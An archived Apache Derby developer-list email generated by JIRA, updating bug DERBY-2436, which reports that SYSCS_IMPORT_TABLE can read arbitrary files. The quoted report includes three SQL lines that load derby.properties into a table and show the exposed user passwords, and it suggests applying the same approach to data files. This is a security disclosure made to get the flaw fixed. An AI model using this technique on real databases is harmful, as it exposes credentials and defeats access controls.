Return-Path: Delivered-To: apmail-db-derby-dev-archive@www.apache.org Received: (qmail 29341 invoked from network); 1 Jul 2009 17:07:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (140.211.11.3) by minotaur.apache.org with SMTP; 1 Jul 2009 17:07:09 -0000 Received: (qmail 61076 invoked by uid 500); 1 Jul 2009 17:00:13 -0000 Delivered-To: apmail-db-derby-dev-archive@db.apache.org Received: (qmail 61062 invoked by uid 500); 1 Jul 2009 17:00:13 -0000 Mailing-List: contact derby-dev-help@db.apache.org; run by ezmlm Precedence: bulk List-Help: List-Unsubscribe: List-Post: List-Id: Reply-To: Delivered-To: mailing list derby-dev@db.apache.org Received: (qmail 61011 invoked by uid 99); 1 Jul 2009 17:00:11 -0000 Received: from nike.apache.org (HELO nike.apache.org) (192.87.106.230) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Jul 2009 17:00:11 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [140.211.11.140] (HELO brutus.apache.org) (140.211.11.140) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Jul 2009 17:00:08 +0000 Received: from brutus (localhost [127.0.0.1]) by brutus.apache.org (Postfix) with ESMTP id 4E434234C045 for ; Wed, 1 Jul 2009 09:59:47 -0700 (PDT) Message-ID: <258702863.1246467587319.JavaMail.jira@brutus> Date: Wed, 1 Jul 2009 09:59:47 -0700 (PDT) From: "Dag H. Wanvik (JIRA)" To: derby-dev@db.apache.org Subject: [jira] Updated: (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files In-Reply-To: <22738087.1173465070154.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DERBY-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Dag H. Wanvik updated DERBY-2436: --------------------------------- Bug behavior facts: [Regression, Security] (was: [Regression]) > SYSCS_IMPORT_TABLE can be used to read derby files > -------------------------------------------------- > > Key: DERBY-2436 > URL: https://issues.apache.org/jira/browse/DERBY-2436 > Project: Derby > Issue Type: Bug > Components: Tools > Affects Versions: 10.1.2.1, 10.2.1.6, 10.3.1.4 > Reporter: Daniel John Debrunner > Priority: Critical > > There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permissions to do so. E.g. even with the secure-by-default network server I can execute three lines of SQL to view to contents of derby.properties, thus seeing passwords of other users, or the address of the ldap server. > create table t (c varchar(32000)); > CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0); > ij> select * from T; > C > ---------------------------------------------- > derby.connection.requireAuthentication=true > derby.authentication.provider=BUILTIN > derby.user.SA=sapwd > derby.user.MARY=marypwd > Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially no that binary data can be exported/imported. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.